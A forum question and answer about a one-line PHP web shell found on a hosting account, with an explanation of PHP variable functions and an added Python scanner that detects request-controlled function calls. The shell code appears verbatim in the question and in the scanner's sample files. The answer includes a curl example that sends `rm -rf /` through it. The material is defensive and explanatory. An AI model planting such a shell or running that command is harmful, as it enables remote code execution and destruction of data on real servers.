Just found malicious php code

I found a malicious php file in my hosting account using this code:

<?=$_GET[0]($_POST[1]);?>

Please help me better understand this code; what are the features of this code for the user?

Thanks in advance.

1 answer
$func = 'strlen';
$arg  = 'foo';

echo $func($arg); // output: 3

You are looking at calling a function variable. In your case, the function name comes from the query string in the URL and the argument from the HTTP POST body. Thus, it can generally accomplish something. Probably someone will try to use it to execute shell code through exec.

e.g.:

$ curl example.com/infected_file.php?exec -d 'rm%20-rf%20/'

(Not 100% sure that this will do it as is, and I don't want to try, but you get the idea.)

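As an added example (not part of the question or the answer above), here is a small Python scanner a defender can run over a hosting account to find the pattern the answer describes: a request superglobal element (`$_GET[...]`, `$_POST[...]`, `$_REQUEST[...]`, ...) used as the callee of a PHP variable-function call, either directly as in the file from the question or routed through `call_user_func`. Variable functions themselves are a legitimate PHP feature (the answer's `$func('foo')` example is not flagged); the warning sign is that the function name and its argument both come from the HTTP request. The sample files and their paths are constructed for the demonstration.

```python
from __future__ import annotations

import os
import re
from dataclasses import dataclass, field

# Request superglobals: anything read from these is attacker-controlled input.
REQUEST_SUPERGLOBALS = ("_GET", "_POST", "_REQUEST", "_COOKIE", "_FILES", "_SERVER")
_SG = "|".join(REQUEST_SUPERGLOBALS)

# Form 1: a superglobal element used directly as the callee, e.g. $_GET[0]($_POST[1]).
DIRECT_CALL = re.compile(
    r"(?P<callee>\$(?:" + _SG + r")\s*\[[^\]]*\])\s*\((?P<args>[^)]*)\)"
)
# Form 2: the same thing routed through PHP's callback helpers.
CALLBACK_CALL = re.compile(
    r"(?P<helper>call_user_func_array|call_user_func)\s*\(\s*"
    r"(?P<callee>\$(?:" + _SG + r")\s*\[[^\]]*\])\s*,?(?P<args>[^)]*)\)"
)
# Any superglobal element inside an argument list (where the payload comes from).
SG_ELEMENT = re.compile(r"\$(?:" + _SG + r")\s*\[[^\]]*\]")


@dataclass
class Finding:
    path: str
    line: int
    form: str                      # "direct" or the helper name
    callee: str                    # expression supplying the function name
    tainted_args: list[str] = field(default_factory=list)
    snippet: str = ""


def _squash(expr: str) -> str:
    """Normalise whitespace so $_GET [ 0 ] and $_GET[0] report identically."""
    return re.sub(r"\s+", "", expr)


def scan_source(source: str, path: str = "<string>") -> list[Finding]:
    """Return one Finding per request-controlled function call in a PHP source string."""
    findings: list[Finding] = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for m in DIRECT_CALL.finditer(line):
            findings.append(Finding(path, lineno, "direct", _squash(m.group("callee")),
                                    [_squash(a) for a in SG_ELEMENT.findall(m.group("args"))],
                                    line.strip()))
        for m in CALLBACK_CALL.finditer(line):
            findings.append(Finding(path, lineno, m.group("helper"), _squash(m.group("callee")),
                                    [_squash(a) for a in SG_ELEMENT.findall(m.group("args"))],
                                    line.strip()))
    return findings


def scan_tree(root: str) -> list[Finding]:
    """Walk a directory (e.g. a hosting account's document root) and scan every .php file."""
    findings: list[Finding] = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".php"):
                full = os.path.join(dirpath, name)
                with open(full, encoding="utf-8", errors="replace") as fh:
                    findings.extend(scan_source(fh.read(), full))
    return findings


def format_finding(f: Finding) -> str:
    args = ", ".join(f.tainted_args) or "(no request-derived arguments)"
    return f"{f.path}:{f.line}: {f.form} call; callee from {f.callee}; arguments from {args}"


# Constructed sample files standing in for a document root (not real hosting content).
SAMPLE_FILES = {
    "public_html/infected_file.php": "<?=$_GET[0]($_POST[1]);?>",
    # Legitimate use of a variable function: the name is a literal, not request data.
    "public_html/index.php": "<?php\n$func = 'strlen';\necho $func('foo');\n",
    "public_html/upload.php": (
        "<?php\nif (isset($_POST['cb'])) { call_user_func($_REQUEST['cb'], $_POST['data']); }\n"
    ),
}


def scan_samples() -> list[Finding]:
    """Scan the constructed samples; scan_tree() does the same for a real directory."""
    findings: list[Finding] = []
    for path, source in SAMPLE_FILES.items():
        findings.extend(scan_source(source, path))
    return findings


if __name__ == "__main__":
    for finding in scan_samples():
        print(format_finding(finding))
```

Run the script as-is to see the two constructed hits (the one-liner from the question and the `call_user_func` variant), or call `scan_tree("/path/to/public_html")` against a real document root. Regex matching is deliberately simple: it will not see obfuscated variants (base64-wrapped code, names assembled from string fragments), so treat a clean result as a first pass, not a clearance.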